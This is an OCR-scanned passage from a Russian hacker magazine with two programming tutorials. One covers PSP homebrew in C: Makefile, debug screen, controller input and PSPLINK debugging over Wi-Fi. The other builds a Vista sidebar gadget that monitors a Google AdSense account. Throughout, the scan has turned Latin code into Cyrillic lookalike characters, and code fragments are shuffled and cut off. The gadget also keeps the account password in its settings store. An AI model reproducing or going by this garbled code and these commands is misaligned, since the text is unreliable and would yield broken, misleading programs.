Компилируют(ой, собирают) программу в ОСС обычно с помощью 
Макекііе. Создаем и его — втой же папке: 

Первоначальный МакеШе 

ТАРСЕТ = Ъеііо 
ОЕкГЗ - таіп. о 

СЕЬАСЗ = -02 -СО -Ѵ7а11 

СХХРЬАСЗ = $ (СЕЬАСЗ) -бпо-ехсербіопз -бпо-гббі 
АЗЕЬАСЗ = $ (СЕЬАСЗ) 

ЕХТВА_ТАРСЕТЗ = ЕВООТ . РВР 
РЗР_ЕВООТ_ТІТЬЕ = Неііо ЭДогІсІ 

РЗРЗБК=$ (зЪеІІ рзр-сопбід --рзрзЪк-рабЪ) 
іпсіисіе $ (РЗРЗБК) /ІіЪ/ЪиіІЪ.так 

Вернись в сигвиновский шелл. Перейди в папку .Ьеііоіѵогіс?, еслиты 
вдругоказался не в ней, и, затаив дыхание, набери таке. Внезапно в папке 
появится файл с милым названием ЕВООТ.РВР. Подключи приставку к 
компьютеру и создай на карточке папку ; \РЗР\САМЕ150 \Не11оМог1сІ\, 
после чего скопируй полученный файл туда. Запустив программу, ты уви- 
дишь на экране сотни заветных строчек! Или не увидишь, тогда придется 
посидеть и поразмышлять, что, собственно, произошло и кактеперь быть. 
Затем можно и разобраться с кодом. В заголовке содержатся два необхо- 
димых инклюда, а далее идет небольшой заголовок на машинном коде. Как 
ни странно .рзрЕеЪидЗсгеепІпіі () подготавливает экран. Приставка 
йеЬид значит, что мы переводим экран в режим отладки (текстовый режим). 
В функции ЗеІирСаІІЪаскз () мы создаем поток [СаІІЪаскТкгеаб. ( ) ), 
в котором при помощи зсеКегпеІСгеабеСаІІЪаск ( ) создается каллбек 
[ЕхібСаІІЪаск ( ) ). После чего через зсеКегпеІРедізбегЕхібСаІІЪас 
к () регистрируем его как каллбек выхода из приложения (если такого калл- 
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СОСІІГід 



Ода! Она реагирует! 



вызова зсеСІгІРеаб.Ви5ЕегРозі ѣіѵе был нажат кружок. 

Что ж, этих знаний вполне хватает, чтобы написать новую программу: 

Маіп() второго «хилловорлда» 

іпС шаіп(іпС агдс , сЬаг ** агдѵ) { 
рзрОеЬидЗсгеепІпіІ: ( ) ; 

ЗеЕирСаІІЪаскз ( ) ; 

зсеСЕгІЗеЕЗатрІіпдМойе (РЗР_СТКЬ_МОБЕ_АЫАЬОС) ; 
ЗсеСЕгІБака рай; 

ѵгііііе(і) { 

СЬгІРеайВиббегРозікіѵе (&рай, 1) ; 



бека не будет, то из приложения выйти без ребута и прочей неприятной ерун- 
ды не получится). Сам каллбэк вызывается при нажатии на кнопку НОМЕ 
и выборе «ДА» — в ответ на вопрос, не хотим ли мы выйти? Теперь можно 
переходить к содержательной части программы — выводу на экран строки 
«Не Но ] [АКЕР! » посредством рзрВеЬидЗсгеепРгіпѣЕ . Как и следует 
из названия, эта функция на следует аргументы родного, сишного ргіпЙ 
— код поведет себя, как и должен :рзрРеЪидЗсгеепРгі п ЬЕ ( " %і " , 

666) . Кириллицу, кстати, функция очень не любит. Загадочная зсеРізрІа 
уИаіѣѴЫапкЗЪагі: () синхронизируетэкран, заодно недавая программе 
зависать — если убрать, то приложение может перестать реагировать на 
кнопку НОМЕ или зависнуть при завершении программы. 



ІТ (рай. ВикСопз & РЗР_СТВЬ_СІКСЬЕ) { 

ІТ (рай. ВиССопз & РЗР_СТКЬ_ЬТРІССЕР) 
рзрБеЬидЗсгеепРгіпкб ( "ОООООООООО" ) ; 
еізе рзрБеЪидЗсгеепРгіпСТ ( "оооооооооо" ) ; 

} 

ІТ (рай. ВиЕЕопз & РЗР_СТКЬ_СВОЗЗ) { 
іі (рай. ВиЕЕопз & РЗР_СТКЬ_КТКІССЕР) 
рзрБеЬидЗсгеепРг іпЬ Т ( "ХХХХХХХХХХ" ) ; 
эізе рзрБеЬидЗсгеепРгіпРТ ( "хххххххххх" ) ; 

} 

рзрОеЬидЗсгеепРгіпкб ( " ХпйОУЗТІСК: %і, %і; " 

" ЕКАМЕ: %і\п", рай.Ьх, рай.Ьу, рай.ТішеЗЬашр); 

зсеОізрІауМаіСѴЫапкЗЕагІ: ( ) ; 



г ЖМЕМ НА КНОПКИ 

Самый гениальный геймдевелопер вряд ли разработает игру, не получаю- 
щую команд от пользователя, а посему нам придется как-то получать доступ 
ксостоянию кнопок и джойстика. За это отвечает одна-единственная 
волшебная функция зсеССгІЕеасЗВиййегРозі&іѵе (’&рай, 1) . 
Здесьрай — заранее определенная тобой переменная типа ЗсеСЬгІРаііа. 
Функция (описанная в файл ерзрсйг 2. й — не забудь пополнить список 
инклудов!) заполняетэту структуру значениями. Они, в свою очередь, зави- 
сят оттекущего состояния контроллера, устанавливающегося при помощи 
функции зсеСІгІЗеІЗатрІіпдМосІе. Всего состояний два : РЗР_СТРЬ_ 
МОПЕ_АЫАЬ 00 — привычноенамсостояниеи РЗР_СТРЬ_МОПЕ_ОІ 01 ТАЬ 
(выставлено поумолчанию) — без джойстика. Таким образом, если мы 
хотим использовать в программе джойстик, нам надо будет вызвать зсеСІг 
ІЗеЬЗатрІіпдМойе ( Р5Р_СТРЬ_М0РЕ_АЫАЬ00) . 

В структуре ЗсеСІгІРаІа (после заполнения вышеуказанной функции) 
будут определены четыре значения: ТітеЗЪатр — количество фреймов от 
начала программы ; ВиЫопз — битовая маска кнопок; Ьх , Ьу — координаты 
джойстика, меняющиеся от 0 до 255. Стандартное положение джойстика 
— примерно 128:128, однако из-за чувствительности отпущенный джойс- 
тик вполне может оказаться в координатах вроде 112 : 139 — всегда стоит 
делать на это поправку. Положение каждой кнопки определяется при помо- 
щи (расІ.ВиІііопз & Ьиѣі:оп_іс1) , гдеЪиІІоп_ісІ — одна из констант: 

РЗР_СТКЬ_ЗЕЬЕСТ - кнопка ЗЕЬЕСТ 
Р 5 Р_С ТКЬ_3 ТАЕТ - кнопка 5 ТАКТ 
РЗР_СТКЬ_ТІР — стрелка вверх 
РЗР_СТКЬ_КІСНТ — стрелка вправо 
РЗР_СТКЬ_ООШІ — стрелка вниз 
РЗР_СТКЬ_ЬЕРТ — стрелка влево 
РЗР_СТКЬ_ЬТКІССЕК - левый шифт 
РЗР_СТКЬ_КТКІССЕК - правый шифт 
РЗР_СТКЬ_ТКІАЫСЬЕ — треугольник 
Р 3 Р_С ТКЬ_С I КС Ь Е - круг 
РЗР_СТКЬ_СКОЗЗ - крестик 
РЗР_СТКЬ_3<217АКЕ - квадратик 

Например, іі (рад. Виѣкопз & РЗР_СТРЬ_СІРСЬЕ) рзрБеЪидЗсге 
епРгіпЬЕ ( "О" ) выполнится лишь в случае, если в момент последнего 



зсеКегпеІЗІеерТкгеай ( ) ; 

геітигп 0; 

} 

Достаточно простая программа. Она все время выводитномер 
текущего фрейма и координаты положения джойстика, а также, 
если нажат нолик или крестик, выведет буквы X или 0 (большие 
или маленькие, в зависимости от нажатых шифтов). Не проблема 
переделать код так, чтобы выводилось больше информации, да и 
если приложить немного усилий — можно сделать, что угодно — от 
крестиков-ноликов до солидной годие-ііке игрушки (ну, почти «что 
угодно»). 

Но простой белый текст на черном фоне выглядит не очень солидно. Чтобы 
втвоихсупермега крестиках-ноликах был анимированный красочный 
аски-арт, не хватает одного — цветов. Они задаются при помощи 32-битно- 
го представления НОВ, и для перевода используется воттакой макрос: 

Ыеііпе ЕСВ(г,д,Ь) ( (и32) ( (ЬуСе) (г) | ( (ЪуЕе) (д) 

« 8) | ( (ЪуНе) (Ь) « 16) ) ) 

Так, соответственно, будет представлен зеленый: РОВ (0, 255, 0) . 
Цвет фона и текста задаются при помощи рзрБеЬидЗсгеепЗеІВаскС 
о1ог(и32 соіог) и рзрРеЪидЗсгеепЗеі:Техі:Со1ог (и32 соіог) : 
рзрРеЪидЗсгеепЗеІВаскСоІог (КОВ (255 , 0, 0) )— красный. 

Если ты программировал для компьютерного текстового режима, то 
помнишь, что после установки цвета фон будет меняться только у све- 
женапечатанных символов. Также и в этом случае. Поэтому для смены 
фона экрана придется пробежаться по всему экрану в цикле (обойти 32 
строки и 68 столбцов). 

Чтобы поставить символ в произвольную точку экрана, можно воспользо- 
ваться фунщлейрзрБеЪидЗсгеепРикСЪаг (іпі: х, іпі у, иЗ 2 соіог, 
и8 сЬ) , гдехиу — координаты, соіог — цвет символа, а ей — сам сим- 
вол. Например, рзрРеЪидЗсгеепРиІСІіаг (99, 120, РОВ ( 0 , 0 , 255) , 
'У' ) установитсинюю Гвточке с координатами 99 и 120. Узнать, в какую 
точку ты попал после таких прыжков, помогут рзрИеЬидЗсгеепОеЬХ и 
рзрРеЪидЗсгеепОекУ. Ну а рзрРеЪидЗсгеепСІеаг очиститэкран (кста- 
ти, вызов этой функции, согласно документации, возвращает цвет фона в 
исходное значение — черное). 



► 090 



ХАКЕР 06 /114/ 08 










1 

^ сосМпд 



зѵп со зѵп: //зѵп.рз2сіеѵ.огд/р5р/!:гипк/р5р1іпк 



Потом перейди в директориюрзр!ілк(ссЗ рзрііпк), 
собери его (таке геіеазе) и зайди с ним в директорию (в моем 
случае — С; \ судѵ7Іп \1іоте \ абтіп \рзр1іпк\) через свой 
файл-менеджер. В папке геіеазе находятся три подпапки с 
программами для приставки — я выбрал ѵі .5. Если она не за- 
пустится, попробуй две другие (ѵі .0 и ѵі ,5_посоггирі). Скопируй 
содержимое (две папки, рзрііпк ѵ\рзр1іпк%) на приставку, в 
каталог : /РЗР/САМЕ150/ на Р5Р. После чего открой файл ;/ 
РЗР/САМЕ150/рзр1іпк/рзр1іпк. іпі и перенастрой (буду 
давать лишьте строчки, значения в которых надо заменить): 




> ІП^О 

П рочти рзр1іпк_ 
тапиаі .рд.Р для 
более подробной ин- 
формации о возмож- 
ностях Р5РІ_ІЫК. 



Итак, ты с видом энтузиаста начал писать программу, и понял, 
что без обращения по имени-отчеству игра теряетсвою супер- 
атмосферу. Как быть? Программировать самому систему ввода? 
Слава компьютерным богам, нет. В 50К входят функции для вы- 
зова экранной клавиатуры и вызывать ее неожиданно просто. 
Сначала надо подключить заголовочный файл <рзрйеЪидкЪ . 
Ь> и добавить в МакеШІе строку, отвечающую за подключе- 
ние дополнительных библиотек: 

ЫВЗ = -ІрзрйеЬидкЪ 

После этого достаточно объявить строку и передать ее функ- 
ции рзрРеЬидКЫпі С . По завершении ввода строка будет 
изменена: 

сЪаг збг [20] = "X] [X" ; 

рзрБеЪидКМпіІ: (зЕг) ; 

рзрБеЪидЗсгеепРгіпЕі ( " %з " , зЕг) ; // выводим! 

Так можно облегчить ввод строк, не отвлекаясь на унылый 
кодинг интерфейса. Конечно, про юзабилити тут лучше и не 
заикаться, но для іехі; тобе — очень даже ничего. 

Кстати, есть другая реализация клавиатуры, используемая 
в порте на Р5Ргодие-Ііке игрушке ТоМЕ. Если зажать в игре 
треугольник, на экране появится список кнопок, среди которых 
стрелочками можно выбрать букву. Правый шифт — аналог ком- 
пьютерного шифта, левый — Сігі. После выбора можно отпустить 
треугольник, и игра отреагирует на букву. В рогаликах та к удоб- 
нее, поскольку у каждой буквы в сочетании с каждой из управля- 
ющих кнопок (сігі и зЫГС) есть свое собственное действие. 

г СКРИНШОТЫ И ОТЛАДКА 

Для удобной отладки при помощи самого обычного дбЬ 
приставку, разумеется, придется подключить к компьютеру. 
Единственный «легальный» способ соединения ПК и Р5Р 
— через 1)5В и специальный пункт в меню настройки, но 
его невозможно использовать одновременно с игрой. На 
помощь приходит Р5РЕІЫК — он не просто предоставит нам 
типичный шелл с возможностями отлаживать программы, 
делать скриншоты экрана или просто бродить по дирек- 
ториям, но и позволит провести связь через ѴѴі-Рі, что изба- 
вит от необходимости запутываться в проводах. 

Ясное дело, для этого нам понадобится точка доступа. Кста- 
ти, у меня не получилось приконнектиться через РБРЬІІЧК 
к запаролен ному ѴѴі-Рі, поэтому придется на время снять 
защиту (это не та к уж и страшно, — за несколько часов, на 
которые я убираю пароль, еще никто не успел насладиться 
безлимитным интернетом за мой счет. В крайнем случае 
можно настроить фильтр клиентов по МАС-адресу). Итак, 
после того, как настроил точку доступа, зайди в настройки 
сети приставки и научи ее соединяться со своей сетью без 
ввода пароля. И вернись за клавиатуру: открой Судѵѵіп и 
слей Р5РЕІІЧК из репозитория: 



изЪтазз=0 

зіоз1іе11=0 

кргіпДЕ=0 

тл7ІЕіз!іе11=1 

Не забудь раскомментировать (убрать #) пять последних строк, 
озаглавленных«1оай Ыпе тосіиіез іог пеііыогкіпд». 
Теперь можешь отключать ЧЗВ-соединение и скачивать РиТТу 
ИЛИ РиТТуТеІ (если утебя его еще нет) — с ЕирѴАлллл/ѵ.сЫагк. 
дгеепепб.ога.ик/'-заІаіЕат/рииѵ/бомпІоасІ.ЬітІ. . а затем запус- 
кать РБРЬІЫК. Подожди несколько секунд, и, когда на экране 
появится «соппесіііоп зкаіе 4 оі 4», запускай РиТТу. В 
качестве ІР-адреса укажи появившийся на экране; порт: 10000; 
тип соединения: ТеІпеЕ Сохрани сессию, чтобы не пришлось 
всякий раз вводитьзаново, и подключайся. Появится консоль. 
Первую командуу меня она не распознавала из-за странных 
глюков, но начиная со второй, все шлоуспешно. 

Все запускаемые программы идут на приставке параллельно 
с работой в консоли с компа. То есть, запустив программу, 
консоль не закроется и не остановится, и ты сможешь дампить 
память и делать скрины. Команды тут вполне знакомые (пол- 
ный их список, кстати, ты найдешь врзр1іпк_тапиа1 .рсШ в 
папке с рзрііпк-ом): 

• 1з — листинг файлов 

• ей — сменить директорию 

• ехіі — возврат в Ѵ5Н (так называется «главное меню» Р5Р) 
зсгзЬоѣ зсгееп.Ътр (или зз зсгееп.Ътр) — скриншот 
экрана в формате ВМР вуказанный в первом аргументе файл 
Ьеір — вывести небольшую справку (если передать ей назва- 
ние команды — выдастсправку по ней). 

Программы запускаются так: . /ЕВООТ.рЬр (предварительно 
нужно сменить директорию на ту, где находится исполняемый 
файл). Прямо походу выполнения можно делать дамп памяти 
на экран ( тетб.итпр ), выводить разную информацию о потоках 
и каллбеках ит.п., но удобнее использовать отладчик — отом, 
какего использовать, рассказано в Мануэле. 

^ ВЗАКЛЮЧЕНИЕ 

На этом все. Если тема тебе понравится (а мы всегда ждем 
твоих отзывов посредством всех известных науке средств 
связи, включая интер нет, теле граф и отправку нарочным), то в 
следующих статьях я расскажу о выводе на экран простейшей 
графики, картинок, работе со спрайтами. Атакже остановлюсь 
подробнее на архитектуре процессора и отладке (которая, кста- 
ти, надостаточно высоком уровне) и на работе с ѴѴі-Рі. Р5Р не 
такая простая и тупая система, как порой кажется. И, возможно, 
если зловещая корпорация 5опу пересмотритсвою политику 
по отношению к инди-девелоперам, программирование для 
приставок может оказаться весьма прибыльным занятием. 

В качестве «домашнего задания» попробуй сделать крестики- 
нолики. Не думаю, что это будет жутко сложным занятием, зато 
достаточно интересно в плане реального опыта .НС 




На компакт-диске 
лежат исходные коды 
программ, написанных 
мной для этой статьи, 
а также инструменты, 
упомянутые в статье. 




> Ііпкз 

Интересную инфор- 
мацию и полезные фо- 
румы (на английском 
языке) можно найти на 
са йтах Ьир://рз2сІеѵ. 
огд/рзр/ и ЫірѴ/ѵѵѵѵѵѵ. 
рзр-ргодгаттіпд. 
сот/ . 
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Рекламные ссылки 

Зарабатывав л ік на Адсенс? 

00 □□□ 000 поисковых залрасов Гугла 

ГГ4ЛЛШО І"іі'ітпп Лпп Ап». 



издания сайтов под Адсенс 

гнгѵг* разйі^оѵ.сот 
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ЭіЁ^іп^Ині 

лПйпвц 

Г|— — мини м 



МОНИТОРИНГ А05ЕМ5Е АККАУНТА ЧЕРЕЗ ѴІ5ТА5ШЕВАВ 



Оптимизаторы могут ставить перед собой разные цели — но, в большинстве 



случаев, это борьба за презренный металл. Ооо%1е Ааьепзе — один из наибо- 



ее лакомых источников обогащения. Уверен, ты так бы сидел, не отрыва- 



сь, смотря на то, как капают лавандосы на адсеновскии счет. Нет проблем 



— сегодня мы напишем удобный АбЗепзе монитор! 



^ АНАТОМИЯ ГАДЖЕТА 

Для начала разберемся, как пишутся гаджеты. Из инструментов тебе пона- 
добится блокнот и... и пожалуй, все. Гаджеты пишутся на НТМІ_ и ЗаѵаЗсгірГ 
Так что, если ты не знаком с С#, А5Р, ЫЫО и прочими модными фишками 
— расслабься и получай удовольствие. В отличие отскриптов, запускаемых 
в веб-браузере, гаджеты имеют гораздо больше возможностей взаимо- 
действия с операционной системой. Еще одна полезная фишка — возмож- 
ность одновременного запуска нескольких копий одного и того же гаджета. 
Например, можно мониторить одновременно несколько АбЗепзе аккаунтов. 
Чтобы создать свой Ѵізіа БісІеЬаг бабдеі, нужно выполнить несколько про- 
стых шагов, которые осилит даже Светка Букина: 

• создать каталог, в котором будут храниться все файлы гаджета; 

• создать НТМІ_-страницу (это основа будущего гаджета); 

• создать ХМ Б-файл (манифест), содержащий описание гаджета для опера- 
ционной системы. 

Все. Гаджет готов. Дополнительно его можно защитить от изменений и 
создать удобный инсталлятор (высший пилотаж, доступный только реально 
крутым хакерам). 

Из приведенного выше алгоритма видно, что гаджет состоит из двух 
файлов: ядро гаджета (НТМ1_-файл) и манифест в ХМІ_-формате. Манифест 
определяетсвойства гаджета — его название, пиктограмму и описание. 
Файл манифеста всегда должен иметь название даддеі .хті. Кроме этих 
двух, в состав гаджета могут входить и другие файлы (НТМІ_, ЗаѵаЗсгірІ:, 
графические файлы, С55). 

г СОЗДАНИЕ НТМЬ-КАРКАСА 

Чтобы сайдбар смог найти новый гаджет, тот должен оказаться в 
нужное время в нужном месте. Аточнее, в каталоге: %изегргоіі1е%\ 



АррБаІа \Ьоса1 \Місгозо^І \ Иіпдоыз ЗідеЪаг\0адде{:з. 

Здесь расположены гаджеты текущего юзера. Еще бывают гаджеты, общие 
для всех пользователей, — для них предусмотрен свой каталог. Перейдя в 
каталог со своими гаджетами, создай отдельный подкаталог для нового. 
Название можешь придумать любое. Главное, чтобы оно заканчивалось на 
« . дайдеѣ». Например, АсІБепзе.дасідеІ. В принципе, можно все файлы 
складывать в корень этого каталога, но хорошим тоном считается следую- 
щая внутренняя файловая организация гаджета: каталоге графическими 
объектами ( ітадез ) и несколько (или один) каталогов с разными версиями 
локализации (например, каталог «еп- из» для интерфейса на американс- 
ком английском — и так далее). 

Теперьоткрывай свой любимый НТМІ_- редактор и пиши следующее: 

<ГШт1> 

<1іеасЬ> 

сЬі1:1е>Ас1зеп8е МопіЬог</1:і1:1е> 

</1іеасІ> 

сЬосІу зЬу1е="ѵ7І(іЫі: 130; ЪеідЫ: : 67"> 

ссііѵ ісІ= " Ъех^Еагпіпдз " >Ошибка инициализации . с/сііѵ> 

ссііѵ ісІ='' ГехІ:СІіскз , '>с/сІіѵ> 

ссііѵ ісі= " кехІ:Ітргеззіопз " >с/сІіѵ> 

с/ЪосІу> 

</Ы:т1> 

Ну как? Я же говорил, что по своей природе гаджет — обычный гипертексто- 
вый документ. А это значит, что большинство технологий, используемых при 
создании НТМІ_-страниц для большого веба, доступны и для гаджето-пи- 
сателей. В шаблоне я сразу разместил слои, в которых будет отображаться 
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Коллекция твоих гаджетов 



информация из АсІЗепзе-аккаунта. Обрати внимание на параметр зіуіе 
— так мы задаем размеры гаджета. Этот параметр есть не что иное, как 
055-дескриптор. Следовательно, другие средства 055-форматирования 
тоже доступны. И, кстати говоря, могутбыть применены клюбому элементу 
(ктем же слоям). 

Теперь перейдем к файлу манифеста. Создавай файлдасідеб . хті : 

<?хш1 ѵегзіоп= " 1 . О " епсосііпд= "ибб-8 " ?> 

<дасідеб> 

<пате>Асізепзе Мопібог</пате> 

<патезрасе>Асізепзе . Сасідебз</патезрасе> 

<1іозбз> 

сЪозб пате="зісІеЪаг"> 

<Ьазе буре="НТМЬ" аріѴегзіоп=" 1 . О . О " згс="асІзепзе. 

Ь.бт1" /> 

<регшіззіопз>Ти11</регшіззіопз> 

<р1аббогт тіпРІаббогтѴегзіоп= "0.3" /> 

</Ъозб> 

</1іозбз> 

</дасідеб> 

Файл небольшой и раскуритего даже пионер. Тег <патезрасе> определя- 
етуникальное пространство имен переменных гаджета (чтобы не возникло 
конфликта с другими гаджетами). С помощью тега <ЬозЬ> можно указать 
расположение гаджета поумолчанию — на сайдбаре или «в свободном пла- 
вании». Здесьжеты сообщаешь системе о версии АРІ, которую собираешь- 
ся заюзать, и, обязательно, — имя НТМІ_-файла. Тег <регтіззіоп> нужен, 
чтобы установить права доступа пользователя к гаджету. 

Есть еще много полезных и не оченьтегов, которыеты можешь использо- 
вать в файле манифеста. Например, теги <1одо> и <ісоп> позволяют 
задать картинки для придания гаджету большей гламурности. Подробно на 
них останавливаться мы не будем. В случае необходимости — кури М50Ы. 
Если твой гаджет лежит в правильном каталоге (смотри выше), жми кнопку 
«плюс» на сайдбаре. В галерее гаджетов должно появиться твое творение. 
Правда, пользы от него никакой. Но это мы скоро исправим. 

г ЕСТЬ У МЕНЯ ОДИН МОГИЛЬНИЧЕК... 

Постепенно подбираемся к нашей цели. Если ты не забыл — это воз- 
можность мониторить АбВепве с сайдбара Висты. Как все происходит в 
браузере?Ты заходишь на сайт ѵѵѵѵѵѵ.доодіе.сопп/асізепзе и вводишьлогин 
и пароль. Ежу понятно, что без браузера порядокдействий будеттотже. 
Следовательно, где-то нужно хранить как сам адрес, так и параметры твоего 
аккаунта. И такая возможность в гаджетах предусмотрена. 

Ты уже знаешь проХМІ_- и НТМІ_-файлы, используемые в любом гаджете. 
Некоторые гаджеты, а именноте, которые требуют предварительной на- 
стройки, включают в себя еще один файл — ЗеІЬіпдз .Ъѣті. Если в катало- 
ге гаджета есть такой файл, то на ярлыке гаджета появляется иконка в виде 
гаечного ключа. При нажатии на нее откроется как раз этот файл, позволяю- 
щий настроить гаджет и сохранить его настройки в реестре системы. 

Для сохранения настроек используется специальный метод из дасідеіз 
АРІ — Зузкет. Оабдеі . і ѵгі бе (параметр , значение) . Для чтения 
сохраненных параметров — методДузбет. Сабдеі . ЗеЫіпдз . 
геаб (параметр) . 



согііпд 
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АсІВепзе басідеі: в разработке 



Определимся, какие параметры нужно сохранить. Прежде всего, этологии 
на вход в систему АсІВепзе и соответствующий пароль. Я бы посоветовал 
добавить параметр, отвечающий за частоту обновления информации. Мож- 
но предусмотреть возможность изменения фона и текста гаджета, чтобы 
он органично вписался в оформлениетвоего рабочего стола. Но это уже от 
лукавого, так как к основному функционалу не относится. 

В какой моментчитать и записывать параметры?Ты можешьделать это по 
своемуусмотрению, но разумнее придерживаться проверенных временем 
рекомендаций. Читать параметры лучше всего после инициализации гад- 
жета. То есть, сразу, кактолько он готов к работе. Для этого функция чтения 
параметров вешается на обработчиксІоситепбопгеасІузІаІесЬапде. После 
его срабатывания нужно проверить, в каком состоянии находится гаджет: 

сіоситепб . опгеайузбабесЪапде = бипсбіопО 
{ 

іі (сіоситепб . геайуЗбабе“"сотр1ебе" ) 

{ 

пате = 8у в Сет. Сайде б . Зеббіпдз . геасі ( "Асізепзе_пате" ) ; 
раззѵюгсі = Зузбет. Сасідеб . Зеббіпдз . геасі ( 
"Асізепзе_раззѵ70гсі" ) ; 
гебгезіі = Зузбет.Сасідеб . Зеббіпдз . геасі ( 
"А(ізепзе_гебгез]і" ) ; 

} 

} 

Естественно, переменные, в которые считываются сохраненные парамет- 
ры, должны быть заранее объявлены. Чтобы ты впоследствии не гадал, с 
какими значениями параметров в данный момент работаешь, не поленись 
там же прописать заполнение полей для ввода полученных значений. Сде- 
лай что-нибудь вроде боситепі: . зеЬир .патеВох. ѵаіие = пате. 
Теперь вешай скрипт на обработчик Дузбет. Сасідеб . 
опЗеІІіпдзСІозіпд. И сохраняй настройки в том случае, если нажата 
соответствующая кнопка — еѵепі .Асііоп. соттіі : 

Зуз бет. Сасідеі: . опЗеббіпдзСІозіпд = бипсбіоп (еѵепб ) 

{ 

іі (еѵепб . сІозеАсбіоп == еѵепб .Асбіоп. соттіб) 

{ 

Зузбет.Сасідеб . Зеббіпдз .шгібе ( "Асізепзе_пате" , 
сіоситепб . зебир . патеВох . ѵаіие ) ; 

Зузбет.Сасідеб . Зеббіпдз .шгібе ( "АсІзепзе_раззѵ\гогсі" , 
сіоситепб . зебир. раз зтлгагсІВох. ѵаіие) ; 

Зузбет.Сасідеб . Зеббіпдз .шгібе ( "Асізепзе_гебгез]і" , 
сіоситепб . зебир . гебгезЫЗох. ѵаіие) ; 
еѵепб.сапсеі = баізе; 

} 

} 
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Гаджет, готовый к инсталляции 




г 60001-Е С ЧЕРНОГО ХОДА 

Вот мы и перешли к самому главному — к программной логике гаджета. 

Все описанные ниже священные камлания я рекомендую тебе оформить 
отдельным )з-файлом, чтобы не мешать мух с котлетами. Все адреса, явки 
и пароли (все Ыір-запросы), помогающие полюбовно договориться с 
АсІЗепзе сервисом, легко и непринужденно отыскиваются с помощью ана- 
лиза отправляемых браузером пакетов. Если есть желание повторить опыт 
самостоятельно, тебе не составит труда найти соответствующий плагин для 
огнелиса. 

Итак, сначала — подключение, боодіе любит, чтобы с ним общалисьс 
помощью ХМІ_-форматов. Не проблема. В ЭаѵаЗсгірІ есть замечательный 
объект хтІННр. 



Соо§ 1 е 
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Заветные циферки 



программ, в которыхты участвуешь. Мы ограничимся двумя — один на ста- 
тистику АбЗепзе для контента и один на стати стику АсІЗепзе для поиска. 

Все запросы строятся по одной и той же схеме. Прежде всего, открываем 
хтІНИр-соединение, указав в качестве параметра тип запроса — Р05Т или 
6ЕТ, строку запроса и дополнительные параметры (если необходимо). За- 
тем формируем НТТР-заголовокзапроса — зеІКедиезІНеабег ( ) . Чтобы 
обойти стороной неприятные моменты с выдачей кэшируемых данных и с 
каждым запросом получать реальные данные, в качестве параметра метода 
зеІКедиезѣНеадег ( ) можно указать воттакую хитрую строчку: «Іі- 
Моб.і^іеб.-Зіпсе» , «ЗаЬ, 1 Зап 2000 00:00:00 СМТ». 

После чего посылаем запрос Гуглу. Если ответ получен, парсим данные, как 
уже демонстрировалось несколькими строками выше. Если ответа так и не 
дождались — грязно ругаемся на пользователя. 



хшІНДДр . Ореп ( " РОЗТ " , 

"Ьіірз : / /ъгѵм. доодіе . сот/асізепзе/іодіп. сіо" , ігие ) ; 
хшІНДДр . зебКефтезбНеасІег ( "Сопіепі-Туре" , 
"арр1ісаііоп/х-ѵтѵтѵ7-іогт-иг1епсосІесі" ) ; 
хшІНДДр . зебКефтезбНеасІег ( " Іб-Мойібіесі-Зіпсе" , 

"5аі, 1 аап 2000 00:00:00СМТ"); 
хтІНРір . зепсі ( "(1езііпаЦіоп=&изегпате=" + пате 
+ "&раззѵ70гсі=" + раззѵгогсі ) ; 

В принципе, с этого момента уже можно конструировать запросы для 
получения данных о состоянии АсІЗепзе баланса. Но предлагаю на время 
отвлечься и ответить на один вопрос. А именно — что ты ожидаешь полу- 
чить в ответ на свой запрос? Я сейчас говорю не о сумме на счете, кото- 
рая тебе снится в сладких снах. Я о формате данных. Чтобы в дальнейшем 
было меньше работы по разгребанию всякого мусора, советую выбрать 
что-нибудь простое. Щедрый боодіе предлагает несколько форматов 
представления отчетов. Грех не воспользоваться такой возможностью. 
Рекомендую остановить свой выбор на формате Т5Ѵ. Это простая таблич- 
ка, в которой столбцы разделяются с помощью знака табуляции, а строки 

— с помощью символа перевода строки. В этой таблице первая колонка 

— количество показов рекламных блоков, вторая — сколько тебе накли- 
кали, а третья — твой баланс. 

Зная структуру табл и цы, можно написать для нее парсер: 
ѵаг гоѵ73 = хшІНСДр . гезропзеТехі . зрііб ( " \п" ) ; 



хтІНб Цр. Ореп ( "РОЗТ" , "запрос", іаізе) ; 
хтІНЦЦр . зеЪКесіиезЪНеасІег ( " Іі-Мосііііесі-Зіпсе" , 

"ЗаД, 1 Тап 2000 00:00:00 СМТ " ) ; 
хтІНДЦр . зепсі ( ) ; 

іі (хтІНіір . зДаЬиз == 200) { 
рагзеБаіа ( ) ; 

} еізе { 

ІоасІзДаСиз = "НТТР Еггог : " + хшІНСРр . зДаДиз ; 

} 

Содержание запроса будет отличаться в зависимости оттого, какую инфор- 
мацию нужно получить. Так, чтобы получить статистику АсІЗепзе для кон- 
тента, используется следующая строка: ЫірзѴ/ѵѵѵѵѵѵ.аооаІе.сот/абзепзе/ 
герогі/аддгеда1е?ои1:ри1:Рогта1:=Т5Ѵ ЕХСЕб . 

Если нужно получить статистику АсІЗепзе для поиска, строка примет вид: 
Ьир5://ѵѵѵѵѵѵ.аооаІе.сот/асІ5еп5е/герогі/ааагеааіе?ргосІисі=аІ5&оиіриіРог 
таІ=Т5Ѵ ЕХСЕб . 



Что добавить? 



ѵаг сеііз = гомз [1] . зріід ( " \б" ) ; 
іі (сеііз . Іепдііі == б) { 

ішргеззіопз += рагзеіпі (сеііз [1] ) ; 
сііскз += рагзеіпі (сеііз [2 ] ) ; 

Ьаіапсе += рагзеРІоаі (сеііз [5] ) ; 

} 

Думаю, тут все понятно, и код в комментариях не нуждается. 

Теперь непосредственно запросы, извлекающие статистику в виде 
ТЗѴ-таблиц. Количество запросов соответствует количеству АсІЗепзе 



При создании гаджета мы оставили без внимания многие аспекты, 
которые нужно обязательно учитывать в реальной жизни. Прежде 
всего, проверяй все вводимые пользователем данные. 

Неплохо было бы проверять и данные, получаемые по Сети (каки 
сам факт успешного получения) . Хорошим тоном считается явное 
указание кодировки текста. 

Существенно повысит безопасность и производительность работы 
гаджета предварительная очистка от «мусора» полученных по Сети 
данных. Есть еще ряд важных аспектов создания качественного и 
безопасного гаджета. Все они описаны в МЗБЫ. 
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Новый элемент в библиотеке гаджетов 



г финиш 

Большая часть работы уже позади — можешь побаловать себя 
бутылочкой кефира. Осталось заняться пользовательским 
интерфейсом и придать гаджету немного глянца. К настояще- 
му моменту мы имеем статистику Ѳоодіе АбБепзе. Как 
вывести ее на морду гаджета? Очень просто — через параметр 
іппегТехЬ текстовых полей. 



іі (ІоасІзЦабиз != 1 ') { 

